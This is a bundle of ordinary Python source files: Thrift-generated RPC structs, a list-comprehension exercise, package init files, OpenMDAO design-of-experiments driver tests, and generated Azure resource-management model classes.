  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('status_args')
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class status_result:
  """
  Attributes:
   - success
  """

  thrift_spec = (
    (0, TType.I32, 'success', None, None, ), # 0
  )

  def __init__(self, success=None,):
    self.success = success

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.I32:
          self.success = iprot.readI32();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('status_result')
    if self.success != None:
      oprot.writeFieldBegin('success', TType.I32, 0)
      oprot.writeI32(self.success)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
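Every generated struct above ends with the same `__repr__`/`__eq__`/`__ne__` boilerplate: equality is a class check plus a `__dict__` comparison, so two structs compare equal exactly when all their fields match. The pattern in isolation (a minimal stand-in class, not the generated one):

```python
# The generated structs compare equal when they are the same class and
# all instance attributes match; this mirrors that with one field.
class MiniStruct(object):
    def __init__(self, serviceName=None):
        self.serviceName = serviceName

    def __repr__(self):
        L = ['%s=%r' % (k, v) for k, v in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)


print(MiniStruct('a') == MiniStruct('a'))   # True
print(MiniStruct('a') != MiniStruct('b'))   # True
print(repr(MiniStruct('a')))                # MiniStruct(serviceName='a')
```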
# exercises/08-python-beyond-basics-exercise-files/values.py (deskach/pybasics)
values = [x / (x - y) for x in range(100) if x > 50 for y in range(100) if x - y != 0]

values = [x / (x - y)
          for x in range(100)
          if x > 50
          for y in range(100)
          if x - y != 0]

values = []
for x in range(100):
    if x > 50:
        for y in range(100):
            if x - y != 0:
                values.append(x / (x - y))
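The three spellings above build the same list; a quick self-contained check, restating the one-line comprehension and the expanded loop:

```python
# The single-line comprehension and the expanded loop produce the same
# values in the same order: the comprehension is the loop, flattened.
one_line = [x / (x - y) for x in range(100) if x > 50
            for y in range(100) if x - y != 0]

looped = []
for x in range(100):
    if x > 50:
        for y in range(100):
            if x - y != 0:
                looped.append(x / (x - y))

print(one_line == looped)   # True
print(len(one_line))        # 49 values of x, 99 of y each -> 4851
```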
# phasIR/__init__.py (MariaPoliti/phasIR)
from .thermal_analysis import *  # noqa: F401, F403
from .image_analysis import * # noqa: F401, F403
from .irtemp import * # noqa: F401, F403
from .data_management import * # noqa: F401, F403
name = 'phasIR'
name = 'phasIR'
# sumo_rl/__init__.py (Eden1114/sumo-rl)
from .environment.env import SumoEnvironment
from .environment.env import env, parallel_env
from .environment.resco_envs import grid4x4, arterial4x4, ingolstadt1, ingolstadt7, ingolstadt21, cologne1, cologne3, cologne8
from .environment.resco_envs import grid4x4, arterial4x4, ingolstadt1, ingolstadt7, ingolstadt21, cologne1, cologne3, cologne8
# openmdao.lib/src/openmdao/lib/drivers/test/test_doedriver.py (swryan/OpenMDAO-Framework)
"""
Test DOEdriver.
"""
import logging
import nose
import os.path
import pkg_resources
import re
import sys
import unittest
from openmdao.lib.datatypes.api import Event
from openmdao.main.api import Assembly, Component, set_as_top
from openmdao.lib.datatypes.api import Float, Bool
from openmdao.lib.casehandlers.api import SequenceCaseFilter
from openmdao.lib.drivers.doedriver import DOEdriver, NeighborhoodDOEdriver
from openmdao.lib.casehandlers.api import ListCaseRecorder, DumpCaseRecorder
from openmdao.lib.doegenerators.api import OptLatinHypercube, FullFactorial, \
CSVFile
# Capture original working directory so we can restore in tearDown().
ORIG_DIR = os.getcwd()
# pylint: disable-msg=E1101

def replace_uuid(msg):
    """ Replace UUID in `msg` with ``UUID``. """
    pattern = '[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'
    return re.sub(pattern, 'UUID', msg)
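The helper normalizes UUIDs so that error messages containing per-run identifiers can be compared against fixed expected strings. Restated standalone, with a made-up message of the kind the assertions below match against:

```python
import re

def replace_uuid(msg):
    """ Replace UUID in `msg` with ``UUID``. """
    pattern = '[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'
    return re.sub(pattern, 'UUID', msg)

# The sample message below is illustrative, not an actual OpenMDAO error.
print(replace_uuid('driven (01234567-89ab-cdef-0123-456789abcdef-1): Forced error'))
# -> driven (UUID-1): Forced error
```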

def rosen_suzuki(x0, x1, x2, x3):
    """ Evaluate polynomial from CONMIN manual. """
    return x0**2 - 5.*x0 + x1**2 - 5.*x1 + \
           2.*x2**2 - 21.*x2 + x3**2 + 7.*x3 + 50
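This polynomial is the objective of the classic Rosen-Suzuki test problem from the CONMIN literature. Restated standalone; the point (0, 1, 2, -1) is the problem's commonly cited constrained optimum, where the objective evaluates to 6:

```python
def rosen_suzuki(x0, x1, x2, x3):
    """ Evaluate polynomial from CONMIN manual. """
    return x0**2 - 5.*x0 + x1**2 - 5.*x1 + \
           2.*x2**2 - 21.*x2 + x3**2 + 7.*x3 + 50

print(rosen_suzuki(0., 1., 2., -1.))   # -> 6.0 (commonly cited optimum)
print(rosen_suzuki(1., 1., 1., 1.))    # value at the component defaults -> 31.0
```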

class DrivenComponent(Component):
    """ Just something to be driven and compute results. """

    x0 = Float(1., iotype='in')
    y0 = Float(1., iotype='in')  # used just to get ParameterGroup
    x1 = Float(1., iotype='in')
    x2 = Float(1., iotype='in')
    x3 = Float(1., iotype='in')
    err_event = Event()
    stop_exec = Bool(False, iotype='in')
    rosen_suzuki = Float(0., iotype='out')

    def __init__(self):
        super(DrivenComponent, self).__init__()
        self._raise_err = False

    def _err_event_fired(self):
        self._raise_err = True

    def execute(self):
        """ Compute results from input vector. """
        self.rosen_suzuki = rosen_suzuki(self.x0, self.x1, self.x2, self.x3)
        if self._raise_err:
            self.raise_exception('Forced error', RuntimeError)
        if self.stop_exec:
            self.parent.driver.stop()  # Only valid if sequential!

class MyModel(Assembly):
    """ Use DOEdriver with DrivenComponent. """

    def configure(self):
        self.add('driver', DOEdriver())
        self.add('driven', DrivenComponent())
        self.driver.workflow.add('driven')
        self.driver.DOEgenerator = OptLatinHypercube(num_samples=10)
        self.driver.case_outputs = ['driven.rosen_suzuki']
        self.driver.add_parameter(('driven.x0', 'driven.y0'),
                                  low=-10., high=10., scaler=20., adder=10.)
        for name in ['x1', 'x2', 'x3']:
            self.driver.add_parameter("driven.%s" % name,
                                      low=-10., high=10., scaler=20., adder=10.)

class TestCaseDOE(unittest.TestCase):
    """ Test DOEdriver. """

    # Need to be in this directory or there are issues with egg loading.
    directory = pkg_resources.resource_filename('openmdao.lib.drivers', 'test')

    def setUp(self):
        os.chdir(self.directory)
        self.model = set_as_top(MyModel())

    def tearDown(self):
        self.model.pre_delete()
        self.model = None
        if os.path.exists('driver.csv'):
            os.remove('driver.csv')
        # Verify we didn't mess-up working directory.
        end_dir = os.getcwd()
        os.chdir(ORIG_DIR)
        if os.path.realpath(end_dir).lower() != os.path.realpath(self.directory).lower():
            self.fail('Ended in %s, expected %s' % (end_dir, self.directory))

    def test_sequential(self):
        logging.debug('')
        logging.debug('test_sequential')
        self.run_cases(sequential=True)

    def test_sequential_errors(self):
        logging.debug('')
        logging.debug('test_sequential_errors')
        self.model.driver._call_execute = True
        self.run_cases(sequential=True, forced_errors=True, retry=True)

    def test_sequential_errors_abort(self):
        self.run_cases(sequential=True, forced_errors=True)

    def test_no_parameter(self):
        logging.debug('')
        logging.debug('test_no_parameter')
        try:
            self.model.driver.add_parameter('foobar.blah')
        except AttributeError as err:
            self.assertEqual(str(err), "driver: Can't add parameter"
                             " 'foobar.blah' because it doesn't exist.")

    def test_event_removal(self):
        self.model.driver.add_event('driven.err_event')
        lst = self.model.driver.get_events()
        self.assertEqual(lst, ['driven.err_event'])
        self.model.driver.remove_event('driven.err_event')
        lst = self.model.driver.get_events()
        self.assertEqual(lst, [])

    def test_param_removal(self):
        lst = self.model.driver.list_param_targets()
        self.assertEqual(lst, ['driven.x0', 'driven.y0',
                               'driven.x1', 'driven.x2', 'driven.x3'])
        self.model.driver.remove_parameter('driven.x1')
        lst = self.model.driver.list_param_targets()
        self.assertEqual(lst, ['driven.x0', 'driven.y0',
                               'driven.x2', 'driven.x3'])

    def test_no_event(self):
        logging.debug('')
        logging.debug('test_no_event')
        try:
            self.model.driver.add_event('foobar.blah')
        except AttributeError as err:
            self.assertEqual(str(err), "driver: Can't add event"
                             " 'foobar.blah' because it doesn't exist")
        else:
            self.fail("expected AttributeError")

    def test_nooutput(self):
        logging.debug('')
        logging.debug('test_nooutput')
        results = ListCaseRecorder()
        self.model.driver.recorders = [results]
        self.model.driver.error_policy = 'RETRY'
        self.model.driver.case_outputs.append('driven.sum_z')
        self.model.run()
        self.assertEqual(len(results),
                         self.model.driver.DOEgenerator.num_samples)
        for case in results.cases:
            expected = "driver: Exception getting case outputs: " \
                       "driven \(UUID.[0-9]+-1\): " \
                       "'DrivenComponent' object has no attribute 'sum_z'"
            msg = replace_uuid(case.msg)
            self.assertTrue(re.match(expected, msg))

    def test_noiterator(self):
        logging.debug('')
        logging.debug('test_noiterator')
        # Check response to no iterator set.
        self.model.driver.recorders = [ListCaseRecorder()]
        self.model.driver.DOEgenerator = None
        try:
            self.model.run()
        except Exception as exc:
            msg = "driver: required plugin 'DOEgenerator' is not present"
            self.assertEqual(str(exc), msg)
        else:
            self.fail('Exception expected')

    def test_norecorder(self):
        logging.debug('')
        logging.debug('test_norecorder')
        self.model.driver.recorders = []
        self.model.run()

    def test_output_error(self):
        class Dummy(Component):
            x = Float(0, iotype="in")
            y = Float(0, iotype="out")
            z = Float(0, iotype="out")

            def execute(self):
                self.y = 10 + self.x

        class Analysis(Assembly):
            def configure(self):
                self.add('d', Dummy())
                self.add('driver', DOEdriver())
                self.driver.DOEgenerator = FullFactorial(2)
                self.driver.recorders = [DumpCaseRecorder()]
                self.driver.add_parameter('d.x', low=0, high=10)
                self.driver.case_outputs = ['d.y', 'd.bad', 'd.z']

        a = Analysis()
        try:
            a.run()
        except Exception as err:
            err = replace_uuid(str(err))
            self.assertTrue(err.startswith('driver: Run aborted: Traceback '))
            self.assertTrue(err.endswith("d (UUID.1-1): 'Dummy' object has no attribute 'bad'"))
        else:
            self.fail("Exception expected")

    def run_cases(self, sequential, forced_errors=False, retry=True):
        # Evaluate cases, either sequentially or across multiple servers.
        self.model.driver.sequential = sequential
        results = ListCaseRecorder()
        self.model.driver.recorders = [results]
        self.model.driver.error_policy = 'RETRY' if retry else 'ABORT'
        if forced_errors:
            self.model.driver.add_event('driven.err_event')

        if retry:
            self.model.run()
            self.assertEqual(len(results), 10)
            self.verify_results(forced_errors)
        else:
            assert_raises(self, 'self.model.run()', globals(), locals(),
                          RuntimeError, "driver: Run aborted:"
                          " RuntimeError('driven: Forced error',)")

    def test_scaling(self):
        self.model.driver.DOEgenerator = ff = FullFactorial(num_levels=3)
        ff.num_parameters = 4
        for case in self.model.driver._get_cases():
            print case

    def verify_results(self, forced_errors=False):
        # Verify recorded results match expectations.
        for case in self.model.driver.recorders[0].cases:
            if forced_errors:
                expected = 'driven \(UUID.[0-9]+-1\): Forced error'
                msg = replace_uuid(case.msg)
                self.assertTrue(re.match(expected, msg))
            else:
                self.assertEqual(case.msg, None)
                self.assertEqual(case['driven.rosen_suzuki'],
                                 rosen_suzuki(*[case['driven.x%s' % i] for i in range(4)]))

    def test_rerun(self):
        logging.debug('')
        logging.debug('test_rerun')
        self.run_cases(sequential=True)
        orig_cases = self.model.driver.recorders[0].cases

        self.model.driver.DOEgenerator = CSVFile(self.model.driver.doe_filename)
        self.model.driver.record_doe = False
        rerun_seq = (1, 3, 5, 7, 9)
        self.model.driver.case_filter = SequenceCaseFilter(rerun_seq)
        rerun = ListCaseRecorder()
        self.model.driver.recorders[0] = rerun
        self.model.run()

        self.assertEqual(len(orig_cases), 10)
        self.assertEqual(len(rerun.cases), len(rerun_seq))
        for i, case in enumerate(rerun.cases):
            self.assertEqual(case, orig_cases[rerun_seq[i]])

class MyModel2(Assembly):
    """ Use DOEdriver with DrivenComponent. """

    def configure(self):
        self.add('driver', NeighborhoodDOEdriver())
        self.add('driven', DrivenComponent())
        self.driver.workflow.add('driven')
        self.driver.DOEgenerator = OptLatinHypercube(num_samples=10)
        self.driver.case_outputs = ['driven.rosen_suzuki']
        self.driver.add_parameter(('driven.x0', 'driven.y0'),
                                  low=-10., high=10., scaler=20., adder=10.)
        for name in ['x1', 'x2', 'x3']:
            self.driver.add_parameter("driven.%s" % name,
                                      low=-10., high=10., scaler=20., adder=10.)
class TestCaseNeighborhoodDOE(unittest.TestCase):
""" Test NeighborhoodDOEdriver. """
# Need to be in this directory or there are issues with egg loading.
directory = pkg_resources.resource_filename('openmdao.lib.drivers', 'test')
def setUp(self):
os.chdir(self.directory)
self.model = set_as_top(MyModel2())
def tearDown(self):
self.model.pre_delete()
self.model = None
# Verify we didn't mess up the working directory.
end_dir = os.getcwd()
os.chdir(ORIG_DIR)
if os.path.realpath(end_dir).lower() != os.path.realpath(self.directory).lower():
self.fail('Ended in %s, expected %s' % (end_dir, self.directory))
def test_sequential(self):
logging.debug('')
logging.debug('test_sequential')
self.run_cases(sequential=True)
def test_sequential_errors(self):
logging.debug('')
logging.debug('test_sequential_errors')
self.model.driver._call_execute = True
self.run_cases(sequential=True, forced_errors=True, retry=True)
def test_sequential_errors_abort(self):
self.run_cases(sequential=True, forced_errors=True)
def test_no_parameter(self):
logging.debug('')
logging.debug('test_no_parameter')
try:
self.model.driver.add_parameter('foobar.blah')
except AttributeError as err:
self.assertEqual(str(err), "driver: Can't add parameter"
" 'foobar.blah' because it doesn't exist.")
else:
self.fail("expected AttributeError")
def test_event_removal(self):
self.model.driver.add_event('driven.err_event')
lst = self.model.driver.get_events()
self.assertEqual(lst, ['driven.err_event'])
self.model.driver.remove_event('driven.err_event')
lst = self.model.driver.get_events()
self.assertEqual(lst, [])
def test_param_removal(self):
lst = self.model.driver.list_param_targets()
self.assertEqual(lst, ['driven.x0', 'driven.y0',
'driven.x1', 'driven.x2', 'driven.x3'])
self.model.driver.remove_parameter('driven.x1')
lst = self.model.driver.list_param_targets()
self.assertEqual(lst, ['driven.x0', 'driven.y0',
'driven.x2', 'driven.x3'])
def test_no_event(self):
logging.debug('')
logging.debug('test_no_event')
try:
self.model.driver.add_event('foobar.blah')
except AttributeError as err:
self.assertEqual(str(err), "driver: Can't add event"
" 'foobar.blah' because it doesn't exist")
else:
self.fail("expected AttributeError")
def test_nooutput(self):
logging.debug('')
logging.debug('test_nooutput')
results = ListCaseRecorder()
self.model.driver.recorders = [results]
self.model.driver.error_policy = 'RETRY'
self.model.driver.case_outputs.append('driven.sum_z')
self.model.run()
self.assertEqual(len(results), 1 + self.model.driver.DOEgenerator.num_samples)
for case in results.cases:
expected = r"driver: Exception getting case outputs: " \
r"driven \(UUID.[0-9]+-1\): " \
r"'DrivenComponent' object has no attribute 'sum_z'"
msg = replace_uuid(case.msg)
self.assertTrue(re.match(expected, msg))
def test_noiterator(self):
logging.debug('')
logging.debug('test_noiterator')
# Check the response when no iterator is set.
self.model.driver.recorders = [ListCaseRecorder()]
self.model.driver.DOEgenerator = None
try:
self.model.run()
except Exception as exc:
msg = "driver: required plugin 'DOEgenerator' is not present"
self.assertEqual(str(exc), msg)
else:
self.fail('Exception expected')
def test_norecorder(self):
logging.debug('')
logging.debug('test_norecorder')
self.model.driver.recorders = []
self.model.run()
def test_output_error(self):
class Dummy(Component):
x = Float(0, iotype="in")
y = Float(0, iotype="out")
z = Float(0, iotype="out")
def execute(self):
self.y = 10 + self.x
class Analysis(Assembly):
def configure(self):
self.add('d', Dummy())
self.add('driver', NeighborhoodDOEdriver())
self.driver.DOEgenerator = FullFactorial(2)
self.driver.recorders = [DumpCaseRecorder()]
self.driver.add_parameter('d.x', low=0, high=10)
self.driver.case_outputs = ['d.y', 'd.bad', 'd.z']
a = Analysis()
try:
a.run()
except Exception as err:
err = replace_uuid(str(err))
self.assertTrue(err.startswith('driver: Run aborted: Traceback '))
self.assertTrue(err.endswith("d (UUID.1-1): 'Dummy' object has no attribute 'bad'"))
else:
self.fail("Exception expected")
def run_cases(self, sequential, forced_errors=False, retry=True):
# Evaluate cases, either sequentially or across multiple servers.
self.model.driver.sequential = sequential
results = ListCaseRecorder()
self.model.driver.recorders = [results]
self.model.driver.error_policy = 'RETRY' if retry else 'ABORT'
if forced_errors:
self.model.driver.add_event('driven.err_event')
if retry:
self.model.run()
self.assertEqual(len(results), 11)
self.verify_results(forced_errors)
else:
assert_raises(self, 'self.model.run()', globals(), locals(),
RuntimeError, "driver: Run aborted:"
" RuntimeError('driven: Forced error',)")
def test_scaling(self):
self.model.driver.DOEgenerator = ff = FullFactorial(num_levels=3)
ff.num_parameters = 4
for case in self.model.driver._get_cases():
print(case)
def verify_results(self, forced_errors=False):
# Verify recorded results match expectations.
for case in self.model.driver.recorders[0].cases:
if forced_errors:
expected = r'driven \(UUID.[0-9]+-1\): Forced error'
msg = replace_uuid(case.msg)
self.assertTrue(re.match(expected, msg))
else:
self.assertEqual(case.msg, None)
self.assertEqual(case['driven.rosen_suzuki'],
rosen_suzuki(*[case['driven.x%s' % i] for i in range(4)]))
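These cases check each recorded output against `rosen_suzuki`, imported from the test helpers. For reference, a sketch of the classic four-variable Rosen-Suzuki test function, which is assumed (not confirmed by this chunk) to be what that helper computes:

```python
def rosen_suzuki(x0, x1, x2, x3):
    """Classic four-variable Rosen-Suzuki test function (assumed form of the helper)."""
    return (x0 ** 2 - 5.0 * x0 + x1 ** 2 - 5.0 * x1 +
            2.0 * x2 ** 2 - 21.0 * x2 + x3 ** 2 + 7.0 * x3 + 50.0)
```

At the origin all variable terms vanish, so the function reduces to its constant offset of 50.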
if __name__ == "__main__":
sys.argv.append('--cover-package=openmdao.lib.drivers')
sys.argv.append('--cover-erase')
nose.runmodule()
#-------------------------------------------------------------------------
# Copyright (c) Microsoft. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#--------------------------------------------------------------------------
# Warning: This code was generated by a tool.
#
# Changes to this file may cause incorrect behavior and will be lost if the
# code is regenerated.
from datetime import datetime
import json
import re
from requests import Session, Request
import time
try:
from urllib import quote, unquote
except:
from urllib.parse import quote, unquote
from azure.common import AzureHttpError
from azure.mgmt.common import AzureOperationResponse, OperationStatusResponse, OperationStatus, Service
from azure.mgmt.common.arm import ResourceBase, ResourceBaseExtended
class LongRunningOperationResponse(AzureOperationResponse):
"""
A standard service response for long running operations.
"""
def __init__(self, **kwargs):
super(LongRunningOperationResponse, self).__init__(**kwargs)
self._operation_status_link = kwargs.get('operation_status_link')
self._retry_after = kwargs.get('retry_after')
self._status = kwargs.get('status')
self._error = kwargs.get('error')
@property
def error(self):
return self._error
@error.setter
def error(self, value):
self._error = value
@property
def operation_status_link(self):
return self._operation_status_link
@operation_status_link.setter
def operation_status_link(self, value):
self._operation_status_link = value
@property
def retry_after(self):
return self._retry_after
@retry_after.setter
def retry_after(self, value):
self._retry_after = value
@property
def status(self):
return self._status
@status.setter
def status(self, value):
self._status = value
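`LongRunningOperationResponse` carries what a caller needs to poll an operation to completion: a status link, a retry interval, and the current status. A minimal, hedged sketch of such a polling loop (the `fetch_status` callable and the status strings are illustrative, not part of this module):

```python
def poll_until_done(fetch_status, max_polls=10):
    """Poll a status callable until a terminal state is reached.

    fetch_status() is assumed to return a (status, retry_after) pair;
    the status strings used here are illustrative.
    """
    for _ in range(max_polls):
        status, retry_after = fetch_status()
        if status != 'InProgress':
            return status
        # A real client would sleep for retry_after seconds before retrying.
    return 'TimedOut'

# Drive the loop with a canned sequence of statuses:
_statuses = iter([('InProgress', 1), ('InProgress', 1), ('Succeeded', 0)])
result = poll_until_done(lambda: next(_statuses))
```

A real client would follow `operation_status_link` on each iteration and honor `retry_after` between requests.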
class ProviderUnregistionResult(AzureOperationResponse):
"""
Resource provider unregistration information.
"""
def __init__(self, **kwargs):
super(ProviderUnregistionResult, self).__init__(**kwargs)
self._provider = kwargs.get('provider')
@property
def provider(self):
"""
Gets or sets the resource provider.
"""
return self._provider
@provider.setter
def provider(self, value):
self._provider = value
class ProviderRegistionResult(AzureOperationResponse):
"""
Resource provider registration information.
"""
def __init__(self, **kwargs):
super(ProviderRegistionResult, self).__init__(**kwargs)
self._provider = kwargs.get('provider')
@property
def provider(self):
"""
Gets or sets the resource provider.
"""
return self._provider
@provider.setter
def provider(self, value):
self._provider = value
class ProviderListResult(AzureOperationResponse):
"""
List of resource providers.
"""
def __init__(self, **kwargs):
super(ProviderListResult, self).__init__(**kwargs)
self._providers = kwargs.get('providers')
self._next_link = kwargs.get('next_link')
@property
def next_link(self):
"""
Gets or sets the URL to get the next set of results.
"""
return self._next_link
@next_link.setter
def next_link(self, value):
self._next_link = value
@property
def providers(self):
"""
Gets or sets the list of resource providers.
"""
return self._providers
@providers.setter
def providers(self, value):
self._providers = value
class ProviderListParameters(object):
"""
Provider list operation parameters.
"""
def __init__(self, **kwargs):
self._top = kwargs.get('top')
@property
def top(self):
"""
Gets or sets the number of records to return. Optional.
"""
return self._top
@top.setter
def top(self, value):
self._top = value
class ProviderGetResult(AzureOperationResponse):
"""
Resource provider information.
"""
def __init__(self, **kwargs):
super(ProviderGetResult, self).__init__(**kwargs)
self._provider = kwargs.get('provider')
@property
def provider(self):
"""
Gets or sets the resource provider.
"""
return self._provider
@provider.setter
def provider(self, value):
self._provider = value
class ResourcesMoveInfo(object):
"""
Parameters for moving resources.
"""
def __init__(self, **kwargs):
self._resources = kwargs.get('resources')
self._target_resource_group = kwargs.get('target_resource_group')
@property
def resources(self):
"""
Gets or sets the ids of the resources.
"""
return self._resources
@resources.setter
def resources(self, value):
self._resources = value
@property
def target_resource_group(self):
"""
The target resource group.
"""
return self._target_resource_group
@target_resource_group.setter
def target_resource_group(self, value):
self._target_resource_group = value
class ResourceExistsResult(AzureOperationResponse):
"""
Resource existence information.
"""
def __init__(self, **kwargs):
super(ResourceExistsResult, self).__init__(**kwargs)
self._exists = kwargs.get('exists')
@property
def exists(self):
"""
Gets or sets the value indicating whether the resource exists.
"""
return self._exists
@exists.setter
def exists(self, value):
self._exists = value
class ResourceListResult(AzureOperationResponse):
"""
List of resources.
"""
def __init__(self, **kwargs):
super(ResourceListResult, self).__init__(**kwargs)
self._resources = kwargs.get('resources')
self._next_link = kwargs.get('next_link')
@property
def next_link(self):
"""
Gets or sets the URL to get the next set of results.
"""
return self._next_link
@next_link.setter
def next_link(self, value):
self._next_link = value
@property
def resources(self):
"""
Gets or sets the list of resources.
"""
return self._resources
@resources.setter
def resources(self, value):
self._resources = value
class ResourceListParameters(object):
"""
Resource list operation parameters.
"""
def __init__(self, **kwargs):
self._resource_group_name = kwargs.get('resource_group_name')
self._resource_type = kwargs.get('resource_type')
self._tag_name = kwargs.get('tag_name')
self._tag_value = kwargs.get('tag_value')
self._top = kwargs.get('top')
@property
def resource_group_name(self):
"""
Gets or sets the resource group to filter by. Optional.
"""
return self._resource_group_name
@resource_group_name.setter
def resource_group_name(self, value):
self._resource_group_name = value
@property
def resource_type(self):
"""
Filter the results for a particular resource type. Optional.
"""
return self._resource_type
@resource_type.setter
def resource_type(self, value):
self._resource_type = value
@property
def tag_name(self):
"""
Filter the results based on a particular tag name. Optional.
"""
return self._tag_name
@tag_name.setter
def tag_name(self, value):
self._tag_name = value
@property
def tag_value(self):
"""
Filter the results for a tag name along with a particular tag value.
Optional.
"""
return self._tag_value
@tag_value.setter
def tag_value(self, value):
self._tag_value = value
@property
def top(self):
"""
Number of records to return. Optional.
"""
return self._top
@top.setter
def top(self, value):
self._top = value
class ResourceCreateOrUpdateResult(AzureOperationResponse):
"""
Resource information.
"""
def __init__(self, **kwargs):
super(ResourceCreateOrUpdateResult, self).__init__(**kwargs)
self._resource = kwargs.get('resource')
@property
def resource(self):
"""
Gets or sets the resource.
"""
return self._resource
@resource.setter
def resource(self, value):
self._resource = value
class GenericResource(ResourceBase):
"""
Resource information.
"""
def __init__(self, **kwargs):
super(GenericResource, self).__init__(**kwargs)
self._properties = kwargs.get('properties')
self._provisioning_state = kwargs.get('provisioning_state')
self._plan = kwargs.get('plan')
@property
def plan(self):
"""
Gets or sets the plan of the resource.
"""
return self._plan
@plan.setter
def plan(self, value):
self._plan = value
@property
def properties(self):
"""
Gets or sets the resource properties.
"""
return self._properties
@properties.setter
def properties(self, value):
self._properties = value
@property
def provisioning_state(self):
"""
Gets or sets resource provisioning state.
"""
return self._provisioning_state
@provisioning_state.setter
def provisioning_state(self, value):
self._provisioning_state = value
class ResourceGetResult(AzureOperationResponse):
"""
Resource information.
"""
def __init__(self, **kwargs):
super(ResourceGetResult, self).__init__(**kwargs)
self._resource = kwargs.get('resource')
@property
def resource(self):
"""
Gets or sets the resource.
"""
return self._resource
@resource.setter
def resource(self, value):
self._resource = value
class TagCreateValueResult(AzureOperationResponse):
"""
Tag information.
"""
def __init__(self, **kwargs):
super(TagCreateValueResult, self).__init__(**kwargs)
self._value = kwargs.get('value')
@property
def value(self):
"""
Gets or sets the tag value.
"""
return self._value
@value.setter
def value(self, value):
self._value = value
class TagCreateResult(AzureOperationResponse):
"""
Tag information.
"""
def __init__(self, **kwargs):
super(TagCreateResult, self).__init__(**kwargs)
self._tag = kwargs.get('tag')
@property
def tag(self):
"""
Gets or sets the tag.
"""
return self._tag
@tag.setter
def tag(self, value):
self._tag = value
class TagsListResult(AzureOperationResponse):
"""
List of subscription tags.
"""
def __init__(self, **kwargs):
super(TagsListResult, self).__init__(**kwargs)
self._tags = kwargs.get('tags')
self._next_link = kwargs.get('next_link')
@property
def next_link(self):
"""
Gets or sets the URL to get the next set of results.
"""
return self._next_link
@next_link.setter
def next_link(self, value):
self._next_link = value
@property
def tags(self):
"""
Gets or sets the list of tags.
"""
return self._tags
@tags.setter
def tags(self, value):
self._tags = value
class DeploymentOperationsGetResult(AzureOperationResponse):
"""
Deployment operation.
"""
def __init__(self, **kwargs):
super(DeploymentOperationsGetResult, self).__init__(**kwargs)
self._operation = kwargs.get('operation')
@property
def operation(self):
"""
Gets or sets the deployment operation.
"""
return self._operation
@operation.setter
def operation(self, value):
self._operation = value
class DeploymentOperationsListResult(AzureOperationResponse):
"""
List of deployment operations.
"""
def __init__(self, **kwargs):
super(DeploymentOperationsListResult, self).__init__(**kwargs)
self._operations = kwargs.get('operations')
self._next_link = kwargs.get('next_link')
@property
def next_link(self):
"""
Gets or sets the URL to get the next set of results.
"""
return self._next_link
@next_link.setter
def next_link(self, value):
self._next_link = value
@property
def operations(self):
"""
Gets or sets the list of deployment operations.
"""
return self._operations
@operations.setter
def operations(self, value):
self._operations = value
class DeploymentOperationsListParameters(object):
"""
Deployment operation list parameters.
"""
def __init__(self, **kwargs):
self._top = kwargs.get('top')
@property
def top(self):
"""
Gets or sets the number of records to return. Optional.
"""
return self._top
@top.setter
def top(self, value):
self._top = value
class ResourceProviderOperationDetailListResult(AzureOperationResponse):
"""
List of resource provider operations.
"""
def __init__(self, **kwargs):
super(ResourceProviderOperationDetailListResult, self).__init__(**kwargs)
self._resource_provider_operation_details = kwargs.get('resource_provider_operation_details')
@property
def resource_provider_operation_details(self):
"""
Gets or sets the list of resource provider operations.
"""
return self._resource_provider_operation_details
@resource_provider_operation_details.setter
def resource_provider_operation_details(self, value):
self._resource_provider_operation_details = value
class ResourceGroupExistsResult(AzureOperationResponse):
"""
Resource group information.
"""
